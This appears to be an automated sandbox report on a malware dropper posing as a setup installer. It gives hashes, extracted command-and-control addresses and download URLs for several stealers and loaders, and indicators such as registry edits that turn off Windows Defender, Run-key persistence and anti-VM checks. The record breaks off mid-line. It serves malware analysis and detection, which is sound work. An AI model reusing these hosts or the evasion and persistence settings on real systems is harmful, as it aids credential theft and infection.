Analysis
-
max time kernel
502s -
max time network
626s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
26-10-2021 09:15
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win10-en-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
5.6MB
-
MD5
22dbd82a1a4fd75da57b26a24ba9cdfa
-
SHA1
6c31926d8b065469f71d7bd070fa4acd7182e414
-
SHA256
e3ccbd6d3d6194b84c0414d931b8d1c687ee17d9275bf155de3a29895f1c6a43
-
SHA512
1b50f871ae2bb7dc06f376ba314431b1b3f059cca3780062405d599b76f4a208f362f2011b887e40070506b944a618d51dbdceed3e59be6b6e75f0086c412b98
Malware Config
Extracted
redline
ChrisNEW
194.104.136.5:46013
Extracted
redline
media25
91.121.67.60:23325
Extracted
smokeloader
2020
http://brandyjaggers.com/upload/
http://andbal.com/upload/
http://alotofquotes.com/upload/
http://szpnc.cn/upload/
http://uggeboots.com/upload/
http://100klv.com/upload/
http://rapmusic.at/upload/
Extracted
vidar
41.5
933
https://mas.to/@xeroxxx
-
profile_id
933
Extracted
raccoon
187e8d46623768b376fedb48580157fafedb4942
-
url4cnc
http://telegin.top/frombobu98s
http://ttmirror.top/frombobu98s
http://teletele.top/frombobu98s
http://telegalive.top/frombobu98s
http://toptelete.top/frombobu98s
http://telegraf.top/frombobu98s
https://t.me/frombobu98s
Signatures
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exerundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 964 4936 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 9072 4936 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 9036 4936 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 912 4936 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
Processes:
resource yara_rule behavioral2/memory/1696-279-0x0000000000418542-mapping.dmp family_redline behavioral2/memory/1696-278-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral2/memory/4764-301-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/4764-303-0x0000000000418D2E-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01fbc1763fd5e9540.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01fbc1763fd5e9540.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 2188 created 3844 2188 WerFault.exe run.exe PID 6028 created 5876 6028 WerFault.exe 8071603.exe PID 5228 created 1108 5228 WerFault.exe Tue0190442925.exe PID 2284 created 8336 2284 WerFault.exe DA65.exe -
Turns off Windows Defender SpyNet reporting 2 TTPs
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3652-484-0x0000000000400000-0x00000000005E0000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\libcurlpp.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS8BFA80E5\libcurlpp.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS8BFA80E5\libcurl.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS8BFA80E5\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\libstdc++-6.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS8BFA80E5\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\libcurl.dll aspack_v212_v242 -
Adds policy Run key to start application 2 TTPs 2 IoCs
Processes:
wscript.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\XBTLYVK = "C:\\Program Files (x86)\\Wuz7\\servicesdfjdgba.exe" wscript.exe -
Blocklisted process makes network request 63 IoCs
Processes:
mshta.execmd.execmd.exeMsiExec.exeflow pid process 19 2440 mshta.exe 64 2440 mshta.exe 66 2440 mshta.exe 68 2440 mshta.exe 19 2440 mshta.exe 101 2440 mshta.exe 113 2440 mshta.exe 137 2440 mshta.exe 161 2440 mshta.exe 163 2440 mshta.exe 177 2440 mshta.exe 185 2440 mshta.exe 238 2440 mshta.exe 243 2440 mshta.exe 394 6752 cmd.exe 427 6524 cmd.exe 432 6524 cmd.exe 445 6524 cmd.exe 741 8028 MsiExec.exe 743 8028 MsiExec.exe 744 8028 MsiExec.exe 745 8028 MsiExec.exe 746 8028 MsiExec.exe 747 8028 MsiExec.exe 748 8028 MsiExec.exe 749 8028 MsiExec.exe 750 8028 MsiExec.exe 751 8028 MsiExec.exe 752 8028 MsiExec.exe 753 8028 MsiExec.exe 754 8028 MsiExec.exe 755 8028 MsiExec.exe 759 8028 MsiExec.exe 761 8028 MsiExec.exe 762 8028 MsiExec.exe 763 8028 MsiExec.exe 764 8028 MsiExec.exe 765 8028 MsiExec.exe 766 8028 MsiExec.exe 767 8028 MsiExec.exe 768 8028 MsiExec.exe 769 8028 MsiExec.exe 770 8028 MsiExec.exe 771 8028 MsiExec.exe 772 8028 MsiExec.exe 774 8028 MsiExec.exe 777 8028 MsiExec.exe 778 8028 MsiExec.exe 779 8028 MsiExec.exe 780 8028 MsiExec.exe 781 8028 MsiExec.exe 785 8028 MsiExec.exe 786 8028 MsiExec.exe 787 8028 MsiExec.exe 788 8028 MsiExec.exe 789 8028 MsiExec.exe 790 8028 MsiExec.exe 791 8028 MsiExec.exe 792 8028 MsiExec.exe 793 8028 MsiExec.exe 796 8028 MsiExec.exe 798 8028 MsiExec.exe 799 8028 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
DYbALA.execmd.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe File opened for modification C:\Windows\system32\drivers\etc\hosts cmd.exe -
Executes dropped EXE 64 IoCs
Processes:
setup_installer.exesetup_install.exeTue0190442925.exeTue01e66a46d03f9.exeCalculator Installation.exeTue01d0efb597f.exeTue01152ad4a43.exeTue01694542e4ea7f27.exeTue0151406c8f0ef2187.exeTue01c87a0e667ccf.exeTue0121df51a9f7cad03.exeMicrosoftEdge.exeTue0164db7e438.exeTue01c895c354b.exeTue015b6b3a9094.exeWerFault.exeTue01aa9c65fe676f9.exeTue01fbc1763fd5e9540.exeTue0164db7e438.tmpTue0164db7e438.exeTue01c895c354b.exeTue0164db7e438.tmpTue01ef2dca82e926ed.exeTue01aa9c65fe676f9.exerun.exerun2.exeTue01ef2dca82e926ed.exemHNJCsmtrK0FHJkzRUTU2mtk.exeGhXkKMW.EXeLzmwAqmV.exeBCleanSoft82.execmd.exeAdvancedRun.exe4.exe5.exesearch_hyperfs_206.exesetup.exeChrome5.exe0016286477.exekPBhgOaGQk.exeMicrosoftEdgeCP.exeLzmwAqmV.exe1395190.exe4120637.exe581531.exe8071603.exe2777786.exeWinHoster.exe5229116.exe1415129.exe919927.exe6811453.exe4239408.exeFphrgjtnjgrqbtrochalunsaintly_2021-10-24_21-38.exeNlV_KHWPqUv4Ag512VH5HAsr.exeMSBuild.exeaVCJWuC78D8ytjpBnuonYiMt.exeUQ2PodDKeOfQz8RMLdhjHRBY.exeMZGnU5fdSxCORNKj98rM7R3_.exek8rkFQ618whqQvozq5sqYJAv.exeJm8HLB0eQU3BTdk5zhJMuwPW.exey7zS9k1Ws2gUJrtdj2Q96yXF.exe3njmFt3PLb0IZOblGWW3FUDf.exepid process 4024 setup_installer.exe 4276 setup_install.exe 1108 Tue0190442925.exe 2364 Tue01e66a46d03f9.exe 2392 Calculator Installation.exe 3068 Tue01d0efb597f.exe 3504 Tue01152ad4a43.exe 3856 Tue01694542e4ea7f27.exe 2720 Tue0151406c8f0ef2187.exe 2680 Tue01c87a0e667ccf.exe 3744 Tue0121df51a9f7cad03.exe 2696 MicrosoftEdge.exe 2400 Tue0164db7e438.exe 2664 Tue01c895c354b.exe 2660 Tue015b6b3a9094.exe 2932 WerFault.exe 2424 Tue01aa9c65fe676f9.exe 2440 Tue01fbc1763fd5e9540.exe 396 Tue0164db7e438.tmp 2760 Tue0164db7e438.exe 1808 Tue01c895c354b.exe 1968 Tue0164db7e438.tmp 1460 Tue01ef2dca82e926ed.exe 1696 Tue01aa9c65fe676f9.exe 3844 run.exe 3936 run2.exe 4764 Tue01ef2dca82e926ed.exe 1524 mHNJCsmtrK0FHJkzRUTU2mtk.exe 3720 GhXkKMW.EXe 4464 LzmwAqmV.exe 4516 BCleanSoft82.exe 1668 cmd.exe 3652 AdvancedRun.exe 1520 4.exe 2688 5.exe 2592 search_hyperfs_206.exe 3108 setup.exe 2392 Calculator Installation.exe 2156 Chrome5.exe 2716 0016286477.exe 4008 kPBhgOaGQk.exe 5480 MicrosoftEdgeCP.exe 5532 LzmwAqmV.exe 5588 1395190.exe 5608 4120637.exe 5676 581531.exe 5876 8071603.exe 5920 2777786.exe 5372 WinHoster.exe 2148 5229116.exe 5508 1415129.exe 5744 919927.exe 2208 6811453.exe 6068 4239408.exe 5992 Fphrgjtnjgrqbtrochalunsaintly_2021-10-24_21-38.exe 1020 NlV_KHWPqUv4Ag512VH5HAsr.exe 4228 MSBuild.exe 2268 aVCJWuC78D8ytjpBnuonYiMt.exe 1144 UQ2PodDKeOfQz8RMLdhjHRBY.exe 4920 MZGnU5fdSxCORNKj98rM7R3_.exe 4412 k8rkFQ618whqQvozq5sqYJAv.exe 3384 Jm8HLB0eQU3BTdk5zhJMuwPW.exe 4376 y7zS9k1Ws2gUJrtdj2Q96yXF.exe 1856 3njmFt3PLb0IZOblGWW3FUDf.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
UFx4mzvwha3EyrqLzYRJLozs.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion UFx4mzvwha3EyrqLzYRJLozs.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion UFx4mzvwha3EyrqLzYRJLozs.exe -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Tue0151406c8f0ef2187.exeT7hE04_dLWXUHYf9p1fLrFgZ.exeHatawaxeje.exeLaekonojaefi.exeCalculator.exeCalculator.exeCalculator.exerun2.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Tue0151406c8f0ef2187.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation T7hE04_dLWXUHYf9p1fLrFgZ.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Hatawaxeje.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Laekonojaefi.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Calculator.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Calculator.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Calculator.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation run2.exe -
Loads dropped DLL 64 IoCs
Processes:
setup_install.exeTue0164db7e438.tmpTue0164db7e438.tmpCalculator Installation.exemsiexec.exeCdy0nsQnBWPiGFHO_iFNTyWE.exerundll32.exeexplorer.exesetup.exeJm8HLB0eQU3BTdk5zhJMuwPW.exevE8VUtPiqqT3L6yzMj8eK3re.tmpnSunlzyh6D8YVl3uc9TpGptO.exesetup.exexqAQrw5h6EoewxGR1rucN7IG.exegCsdNoPCEI7ErkSz1cNAHOCW.tmpmsiexec.exeCC68.exeinstaller.exeCalculator.exeCalculator.exeCalculator.exeCalculator.exeEFB3.exepid process 4276 setup_install.exe 4276 setup_install.exe 4276 setup_install.exe 4276 setup_install.exe 4276 setup_install.exe 4276 setup_install.exe 4276 setup_install.exe 4276 setup_install.exe 396 Tue0164db7e438.tmp 1968 Tue0164db7e438.tmp 2392 Calculator Installation.exe 2392 Calculator Installation.exe 5732 msiexec.exe 1488 Cdy0nsQnBWPiGFHO_iFNTyWE.exe 1488 Cdy0nsQnBWPiGFHO_iFNTyWE.exe 2392 Calculator Installation.exe 2392 Calculator Installation.exe 4932 rundll32.exe 5956 explorer.exe 5956 explorer.exe 2392 Calculator Installation.exe 4572 setup.exe 4572 setup.exe 3384 Jm8HLB0eQU3BTdk5zhJMuwPW.exe 3384 Jm8HLB0eQU3BTdk5zhJMuwPW.exe 6564 vE8VUtPiqqT3L6yzMj8eK3re.tmp 6776 nSunlzyh6D8YVl3uc9TpGptO.exe 6776 nSunlzyh6D8YVl3uc9TpGptO.exe 6776 nSunlzyh6D8YVl3uc9TpGptO.exe 6776 nSunlzyh6D8YVl3uc9TpGptO.exe 4876 setup.exe 4876 setup.exe 6900 xqAQrw5h6EoewxGR1rucN7IG.exe 6900 xqAQrw5h6EoewxGR1rucN7IG.exe 6656 gCsdNoPCEI7ErkSz1cNAHOCW.tmp 6900 xqAQrw5h6EoewxGR1rucN7IG.exe 6900 xqAQrw5h6EoewxGR1rucN7IG.exe 6900 xqAQrw5h6EoewxGR1rucN7IG.exe 5596 msiexec.exe 5596 msiexec.exe 6900 xqAQrw5h6EoewxGR1rucN7IG.exe 2128 CC68.exe 2128 CC68.exe 7268 installer.exe 7268 installer.exe 4572 setup.exe 4572 setup.exe 4572 setup.exe 7632 Calculator.exe 7632 Calculator.exe 7632 Calculator.exe 5168 Calculator.exe 4572 setup.exe 1152 Calculator.exe 2392 Calculator Installation.exe 4876 setup.exe 4876 setup.exe 7264 Calculator.exe 7264 Calculator.exe 7264 Calculator.exe 4876 setup.exe 7268 installer.exe 7532 EFB3.exe 7532 EFB3.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
3njmFt3PLb0IZOblGWW3FUDf.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Pictures\Adobe Films\3njmFt3PLb0IZOblGWW3FUDf.exe = "0" 3njmFt3PLb0IZOblGWW3FUDf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 3njmFt3PLb0IZOblGWW3FUDf.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 3njmFt3PLb0IZOblGWW3FUDf.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths 3njmFt3PLb0IZOblGWW3FUDf.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions 3njmFt3PLb0IZOblGWW3FUDf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" 3njmFt3PLb0IZOblGWW3FUDf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" 3njmFt3PLb0IZOblGWW3FUDf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 3njmFt3PLb0IZOblGWW3FUDf.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection 3njmFt3PLb0IZOblGWW3FUDf.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet 3njmFt3PLb0IZOblGWW3FUDf.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 10 IoCs
Processes:
cmd.exesetup.exeCC68.exeMSBuild.exe2777786.exesetup.exeDYbALA.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\MSBuild\\Mugukadigy.exe\"" cmd.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --loGQqfG2tg" setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run CC68.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\MSBuild = "\"C:\\Users\\Admin\\AppData\\Roaming\\MSBuild.exe\"" MSBuild.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 2777786.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --loGQqfG2tg" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --loGQqfG2tg" CC68.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Mail\\Qatohukuny.exe\"" DYbALA.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
mHNJCsmtrK0FHJkzRUTU2mtk.exeUFx4mzvwha3EyrqLzYRJLozs.exejg1_1faf.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mHNJCsmtrK0FHJkzRUTU2mtk.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA UFx4mzvwha3EyrqLzYRJLozs.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg1_1faf.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exeinstaller.exedescription ioc process File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 301 ipinfo.io 91 freegeoip.app 94 freegeoip.app 100 freegeoip.app 264 ipinfo.io 263 ipinfo.io 42 ip-api.com 93 freegeoip.app 149 ipinfo.io 150 ipinfo.io -
Drops file in System32 directory 20 IoCs
Processes:
svchost.exesvchost.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\686AD3B12FDB68487AAEA92D0A823EB3 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedUpdater svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #2 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #5 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 49DF67516B2682E8 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #1 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #6 svchost.exe File opened for modification C:\Windows\System32\Tasks\PowerControl LG svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\686AD3B12FDB68487AAEA92D0A823EB3 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 svchost.exe File opened for modification C:\Windows\System32\Tasks\Smart Clock svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File opened for modification C:\Windows\System32\Tasks\PowerControl HR svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent BAED066EAF005F47 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #3 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #4 svchost.exe File opened for modification C:\Windows\System32\Tasks\services64 svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
UFx4mzvwha3EyrqLzYRJLozs.exepid process 952 UFx4mzvwha3EyrqLzYRJLozs.exe -
Suspicious use of SetThreadContext 15 IoCs
Processes:
Tue01aa9c65fe676f9.exeMicrosoftEdge.exerun.exe8071603.exe4239408.exeTue01d0efb597f.exesvchost.exexGgxfdTAZIxYAbC9nMWHnOyd.exeu0K_F2OTXf91BubRsbpokJYY.exeMZGnU5fdSxCORNKj98rM7R3_.exewscript.exe3njmFt3PLb0IZOblGWW3FUDf.exeB16D.execonhost.exedescription pid process target process PID 2424 set thread context of 1696 2424 Tue01aa9c65fe676f9.exe Tue01aa9c65fe676f9.exe PID 2696 set thread context of 4764 2696 MicrosoftEdge.exe Tue01ef2dca82e926ed.exe PID 3844 set thread context of 4796 3844 run.exe AppLaunch.exe PID 5876 set thread context of 5944 5876 8071603.exe AppLaunch.exe PID 6068 set thread context of 5956 6068 4239408.exe explorer.exe PID 3068 set thread context of 4228 3068 Tue01d0efb597f.exe MSBuild.exe PID 4628 set thread context of 5964 4628 svchost.exe svchost.exe PID 1860 set thread context of 3060 1860 xGgxfdTAZIxYAbC9nMWHnOyd.exe Explorer.EXE PID 5312 set thread context of 2824 5312 u0K_F2OTXf91BubRsbpokJYY.exe AppLaunch.exe PID 4920 set thread context of 6216 4920 MZGnU5fdSxCORNKj98rM7R3_.exe MZGnU5fdSxCORNKj98rM7R3_.exe PID 5128 set thread context of 3060 5128 wscript.exe Explorer.EXE PID 1856 set thread context of 6756 1856 3njmFt3PLb0IZOblGWW3FUDf.exe 3njmFt3PLb0IZOblGWW3FUDf.exe PID 3928 set thread context of 6260 3928 B16D.exe B16D.exe PID 3188 set thread context of 6992 3188 conhost.exe explorer.exe PID 5128 set thread context of 6992 5128 wscript.exe explorer.exe -
autoit_exe 4 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01c87a0e667ccf.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01c87a0e667ccf.exe autoit_exe C:\Users\Public\run2.exe autoit_exe C:\Users\Public\run2.exe autoit_exe -
Drops file in Program Files directory 33 IoCs
Processes:
msiexec.exek8rkFQ618whqQvozq5sqYJAv.exejg1_1faf.exeDYbALA.exewscript.exeExplorer.EXEcmd.exeTue0164db7e438.tmpy7zS9k1Ws2gUJrtdj2Q96yXF.exedescription ioc process File created C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk msiexec.exe File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini msiexec.exe File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url msiexec.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini k8rkFQ618whqQvozq5sqYJAv.exe File created C:\Program Files (x86)\Company\NewProduct\d.jfm jg1_1faf.exe File created C:\Program Files (x86)\Windows Mail\Qatohukuny.exe DYbALA.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe k8rkFQ618whqQvozq5sqYJAv.exe File created C:\Program Files (x86)\Company\NewProduct\d jg1_1faf.exe File created C:\Program Files (x86)\Windows Mail\Qatohukuny.exe.config DYbALA.exe File opened for modification C:\Program Files (x86)\Wuz7\servicesdfjdgba.exe wscript.exe File created C:\Program Files (x86)\Wuz7\servicesdfjdgba.exe Explorer.EXE File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url msiexec.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d jg1_1faf.exe File created C:\Program Files\MSBuild\LLGXRUZBEI\foldershare.exe cmd.exe File created C:\Program Files\Google\HAOHKYHASN\foldershare.exe DYbALA.exe File created C:\Program Files\Google\HAOHKYHASN\foldershare.exe.config DYbALA.exe File created C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe msiexec.exe File created C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe msiexec.exe File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat Tue0164db7e438.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\inst3.exe k8rkFQ618whqQvozq5sqYJAv.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d.INTEG.RAW jg1_1faf.exe File created C:\Program Files (x86)\FarLabUninstaller\is-SL37E.tmp Tue0164db7e438.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\d.jfm jg1_1faf.exe File created C:\Program Files\MSBuild\LLGXRUZBEI\foldershare.exe.config cmd.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe y7zS9k1Ws2gUJrtdj2Q96yXF.exe File created C:\Program Files (x86)\Company\NewProduct\tmp.edb jg1_1faf.exe File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat Tue0164db7e438.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\cutm3.exe k8rkFQ618whqQvozq5sqYJAv.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe k8rkFQ618whqQvozq5sqYJAv.exe File opened for modification C:\Program Files (x86)\Wuz7 Explorer.EXE File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe y7zS9k1Ws2gUJrtdj2Q96yXF.exe File created C:\Program Files (x86)\MSBuild\Mugukadigy.exe cmd.exe File created C:\Program Files 